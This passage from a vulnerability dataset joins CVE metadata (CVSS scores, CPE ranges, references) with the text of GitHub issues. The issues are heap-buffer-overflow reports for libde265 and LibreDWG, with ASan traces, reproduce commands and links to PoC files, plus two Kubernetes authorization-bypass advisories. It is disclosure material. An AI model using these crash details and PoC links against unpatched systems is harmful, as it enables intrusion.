#5 0x555555683316 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#6 0x5555556878c1 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4497
#7 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#8 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#9 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#18 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#19 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#20 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
0x61b00000ae1c is located 20 bytes to the right of 1416-byte region [0x61b00000a880,0x61b00000ae08)
allocated by thread T0 here:
#0 0x7ffff7692587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104
#1 0x55555558858e in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:633
#2 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#3 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#4 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#5 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#6 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/libde265/libde265/motion.cc:1894 in derive_spatial_luma_vector_prediction(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, int, int, int, int, unsigned char*, MotionVector*)
Shadow bytes around the buggy address:
0x0c367fff9570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff95a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff95b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fff95c0: 00 fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fff95e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fff95f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3163634==ABORTING
```
# POC
[poc_hbo01.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_hbo01.bin)
# Impact
This vulnerability is capable of crashing software, bypass protection mechanism, modify of memory, and successful exploitation may lead to code execution.
| heap-buffer-overflow in function derive_spatial_luma_vector_prediction at motion.cc:1894 | https://api.github.com/repos/strukturag/libde265/issues/388/comments | 2 | 2023-01-30T00:57:44Z | 2023-03-04T07:42:32Z | https://github.com/strukturag/libde265/issues/388 | 1,561,547,743 | 388 |
CVE-2023-25222 | 2023-03-01T15:15:11.860 | A heap-based buffer overflow vulnerability exits in GNU LibreDWG v0.12.5 via the bit_read_RC function at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/615"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/LibreDWG/libredwg/issues/615 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | # Description
heap-buffer-overflow in function bit_read_RC at bits.c:320
# Version
```
git log
commit 3c90dc6641e11e486666940d7f354d2df54503d6 (HEAD -> master, tag: 0.12.5.5010, origin/master, origin/HEAD)
Author: Michal Josef Špaček <[email protected]>
Date: Fri Jan 27 18:50:08 2023 +0100
```
# Steps to reproduce
```
apt install jing libjaxp1.3-java libbatik-java libavalon-framework-java
git clone https://github.com/LibreDWG/libredwg.git
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
cd libredwg
sh ./autogen.sh
./configure --enable-release --enable-trace --disable-shared
make -j
```
```
cd programs
./dwg2dxf -b -m ./poc_hbo01.bin -o /dev/null
Reading DWG file ./poc_hbo01.bin
=================================================================
==3322912==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61700000007f at pc 0x0000004f4ebf bp 0x7fffffffaca0 sp 0x7fffffffac98
READ of size 1 at 0x61700000007f thread T0
#0 0x4f4ebe in bit_read_RC /home/fuzz/libredwg/src/bits.c:320:10
#1 0x4f5b15 in bit_read_RS /home/fuzz/libredwg/src/bits.c:380:11
#2 0x4f6155 in bit_read_RL /home/fuzz/libredwg/src/bits.c:443:11
#3 0x51d38f in decode_R13_R2000 /home/fuzz/libredwg/src/decode.c:682:9
#4 0x515806 in dwg_decode /home/fuzz/libredwg/src/decode.c:225:38
#5 0x4ce9c3 in dwg_read_file /home/fuzz/libredwg/src/dwg.c:255:11
#6 0x4cb903 in main /home/fuzz/libredwg/programs/dwg2dxf.c:258:15
#7 0x7ffff7c49082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#8 0x41d4bd in _start (/home/fuzz/libredwg/programs/dwg2dxf+0x41d4bd)
0x61700000007f is located 1 bytes to the left of 652-byte region [0x617000000080,0x61700000030c)
allocated by thread T0 here:
#0 0x498892 in calloc (/home/fuzz/libredwg/programs/dwg2dxf+0x498892)
#1 0x4ccfc7 in dat_read_file /home/fuzz/libredwg/src/dwg.c:91:33
#2 0x4ce911 in dwg_read_file /home/fuzz/libredwg/src/dwg.c:248:15
#3 0x4cb903 in main /home/fuzz/libredwg/programs/dwg2dxf.c:258:15
#4 0x7ffff7c49082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/libredwg/src/bits.c:320:10 in bit_read_RC
Shadow bytes around the buggy address:
0x0c2e7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2e7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c2e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3322912==ABORTING
```
# POC
[poc_hbo01.bin](https://github.com/JieyongMa/poc/raw/main/libredwg/poc_hbo01.bin)
# Impact
This vulnerability is capable of crashing software, bypass protection mechanism, modify of memory, and successful exploitation may lead to code execution.
| heap-buffer-overflow in function bit_read_RC at bits.c:320 | https://api.github.com/repos/LibreDWG/libredwg/issues/615/comments | 1 | 2023-01-30T08:00:12Z | 2023-04-29T20:50:44Z | https://github.com/LibreDWG/libredwg/issues/615 | 1,561,928,009 | 615 |
CVE-2022-3162 | 2023-03-01T19:15:25.457 | Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. Clusters are impacted by this vulnerability if all of the following are true: 1. There are 2+ CustomResourceDefinitions sharing the same API group 2. Users have cluster-wide list or watch authorization on one of those custom resources. 3. The same users are not authorized to read another custom resource in the same API group. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Secondary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/113756"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/iUd550j7kjA"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230511-0004/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1780A92B-C6FB-410B-8374-88D1D296816A",
"versionEndExcluding": null,
"versionEndIncluding": "1.22.15",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A09EA928-A8A1-4CEC-A16F-AD65BD31A9D4",
"versionEndExcluding": null,
"versionEndIncluding": "1.23.13",
"versionStartExcluding": null,
"versionStartIncluding": "1.23.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DDE00AE9-4CCC-49AA-B5D4-80A6FAE0FCB1",
"versionEndExcluding": null,
"versionEndIncluding": "1.24.7",
"versionStartExcluding": null,
"versionStartIncluding": "1.24.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A01548FA-CE9A-4ACB-8AC5-C85F16BC134B",
"versionEndExcluding": null,
"versionEndIncluding": "1.25.3",
"versionStartExcluding": null,
"versionStartIncluding": "1.25.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/kubernetes/kubernetes/issues/113756 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS Rating: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
A security issue was discovered in Kubernetes where users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization.
### Am I vulnerable?
Clusters are impacted by this vulnerability if all of the following are true:
- There are 2+ CustomResourceDefinitions sharing the same API group
- Users have cluster-wide list or watch authorization on one of those custom resources.
- The same users are not authorized to read another custom resource in the same API group.
#### Affected Versions
- Kubernetes kube-apiserver <= v1.25.3
- Kubernetes kube-apiserver <= v1.24.7
- Kubernetes kube-apiserver <= v1.23.13
- Kubernetes kube-apiserver <= v1.22.15
### How do I mitigate this vulnerability?
Upgrading the kube-apiserver to a fixed version mitigates this vulnerability.
Prior to upgrading, this vulnerability can be mitigated by avoiding granting cluster-wide list and watch permissions.
#### Fixed Versions
- Kubernetes kube-apiserver v1.25.4
- Kubernetes kube-apiserver v1.24.8
- Kubernetes kube-apiserver v1.23.14
- Kubernetes kube-apiserver v1.22.16
### Detection
Requests containing `..` in the request path are a likely indicator of exploitation. Request paths may be captured in API audit logs, or in kube-apiserver HTTP logs.
If you find evidence that this vulnerability has been exploited, please contact [email protected]
#### Acknowledgements
This vulnerability was reported by Richard Turnbull of NCC Group as part of the Kubernetes Audit.
<!-- labels -->
/area security
/kind bug
/committee security-response
/label official-cve-feed
/sig api-machinery
/area apiserver
| CVE-2022-3162: Unauthorized read of Custom Resources | https://api.github.com/repos/kubernetes/kubernetes/issues/113756/comments | 17 | 2022-11-08T21:33:07Z | 2022-12-08T03:40:09Z | https://github.com/kubernetes/kubernetes/issues/113756 | 1,440,934,711 | 113,756 |
CVE-2022-3294 | 2023-03-01T19:15:25.570 | Users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an untrusted user can modify Node objects and send proxy requests to them. Kubernetes supports node proxying, which allows clients of kube-apiserver to access endpoints of a Kubelet to establish connections to Pods, retrieve container logs, and more. While Kubernetes already validates the proxying address for Nodes, a bug in kube-apiserver made it possible to bypass this validation. Bypassing this validation could allow authenticated requests destined for Nodes to to the API server's private network. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.7000000000000001,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Secondary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/113757"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/VyPOxF7CIbA"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230505-0007/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38E275C4-8711-435F-85D8-073116D467CF",
"versionEndExcluding": "1.22.16",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16AF218C-A7AD-4A8A-9F97-A89D1ADC6C67",
"versionEndExcluding": "1.23.14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.23.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD71BF6D-ABA3-4974-856B-10B9450C741F",
"versionEndExcluding": "1.24.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.24.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "105810A5-2E62-441A-B07B-9F8A0E774712",
"versionEndExcluding": "1.25.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.25.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/kubernetes/kubernetes/issues/113757 | [
"Patch",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS Rating: [CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
A security issue was discovered in Kubernetes where users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an untrusted user can modify Node objects and send proxy requests to them.
Kubernetes supports node proxying, which allows clients of kube-apiserver to access endpoints of a Kubelet to establish connections to Pods, retrieve container logs, and more. While Kubernetes already validates the proxying address for Nodes, a bug in kube-apiserver made it possible to bypass this validation. Bypassing this validation could allow authenticated requests destined for Nodes to to the API server's private network.
### Am I vulnerable?
Clusters are affected by this vulnerability if there are endpoints that the kube-apiserver has connectivity to that users should not be able to access. This includes:
- kube-apiserver is in a separate network from worker nodes
- localhost services
mTLS services that accept the same client certificate as nodes may be affected. The severity of this issue depends on the privileges & sensitivity of the exploitable endpoints.
Clusters that configure the egress selector to use a proxy for cluster traffic may not be affected.
#### Affected Versions
- Kubernetes kube-apiserver <= v1.25.3
- Kubernetes kube-apiserver <= v1.24.7
- Kubernetes kube-apiserver <= v1.23.13
- Kubernetes kube-apiserver <= v1.22.15
### How do I mitigate this vulnerability?
Upgrading the **kube-apiserver** to a fixed version mitigates this vulnerability.
Aside from upgrading, configuring an [egress proxy for egress to the cluster network](https://kubernetes.io/docs/tasks/extend-kubernetes/setup-konnectivity/) can mitigate this vulnerability.
#### Fixed Versions
- Kubernetes kube-apiserver v1.25.4
- Kubernetes kube-apiserver v1.24.8
- Kubernetes kube-apiserver v1.23.14
- Kubernetes kube-apiserver v1.22.16
**Fix impact:** In some cases, the fix can break clients that depend on the nodes/proxy subresource, specifically if a kubelet advertises a localhost or link-local address to the Kubernetes control plane.
### Detection
Node create & update requests may be included in the Kubernetes audit log, and can be used to identify requests for IP addresses that should not be permitted. Node proxy requests may also be included in audit logs.
If you find evidence that this vulnerability has been exploited, please contact [email protected]
#### Acknowledgements
This vulnerability was reported by Yuval Avrahami of Palo Alto Networks.
<!-- labels -->
/area security
/kind bug
/committee security-response
/label official-cve-feed
/sig api-machinery
/area apiserver | CVE-2022-3294: Node address isn't always verified when proxying | https://api.github.com/repos/kubernetes/kubernetes/issues/113757/comments | 2 | 2022-11-08T21:33:26Z | 2023-04-27T08:27:18Z | https://github.com/kubernetes/kubernetes/issues/113757 | 1,440,935,103 | 113,757 |
CVE-2022-47664 | 2023-03-03T15:15:10.887 | Libde265 1.0.9 is vulnerable to Buffer Overflow in ff_hevc_put_hevc_qpel_pixels_8_sse | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/368"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.9:*:*:*:*:*:*:*",
"matchCriteriaId": "8186C657-3009-4756-B2AC-531BD7926074",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/368 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*)
# Version info
```
dec265 v1.0.9
--------------
usage: dec265 [options] videofile.bin
The video file must be a raw bitstream, or a stream with NAL units (option -n).
options:
-q, --quiet do not show decoded image
-t, --threads N set number of worker threads (0 - no threading)
-c, --check-hash perform hash check
-n, --nal input is a stream with 4-byte length prefixed NAL units
-f, --frames N set number of frames to process
-o, --output write YUV reconstruction
-d, --dump dump headers
-0, --noaccel do not use any accelerated code (SSE)
-v, --verbose increase verbosity level (up to 3 times)
-L, --no-logging disable logging
-B, --write-bytestream FILENAME write raw bytestream (from NAL input)
-m, --measure YUV compute PSNRs relative to reference YUV
-T, --highest-TID select highest temporal sublayer to decode
--disable-deblocking disable deblocking filter
--disable-sao disable sample-adaptive offset filter
-h, --help show help
```
# Reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
mkdir build
cd build
cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
make -j$(nproc)
./dec265/dec265 653.bin
```
# ASAN
```
WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
WARNING: non-existing PPS referenced
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
=================================================================
==733371==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00000d190 at pc 0x7f929c8bfbbc bp 0x7ffcdcf97080 sp 0x7ffcdcf97070
READ of size 16 at 0x61b00000d190 thread T0
#0 0x7f929c8bfbbb in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb)
#1 0x7f929c7b249f in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a949f)
#2 0x7f929c7b35a7 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aa5a7)
#3 0x7f929c7a4a8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x19ba8b)
#4 0x7f929c7b1a2e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a8a2e)
#5 0x7f929c7ef80b in read_coding_unit(thread_context*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e680b)
#6 0x7f929c7f1762 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8762)
#7 0x7f929c7f1675 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8675)
#8 0x7f929c7f1610 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8610)
#9 0x7f929c7f15a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
#10 0x7f929c7e8d49 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfd49)
#11 0x7f929c7f1f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
#12 0x7f929c7f3c3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
#13 0x7f929c746e6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
#14 0x7f929c747673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
#15 0x7f929c746311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
#16 0x7f929c74605b in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d05b)
#17 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
#18 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
#19 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
#20 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
#21 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#22 0x7f929c0d7e3f in __libc_start_main_impl ../csu/libc-start.c:392
#23 0x5613fc12f7c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
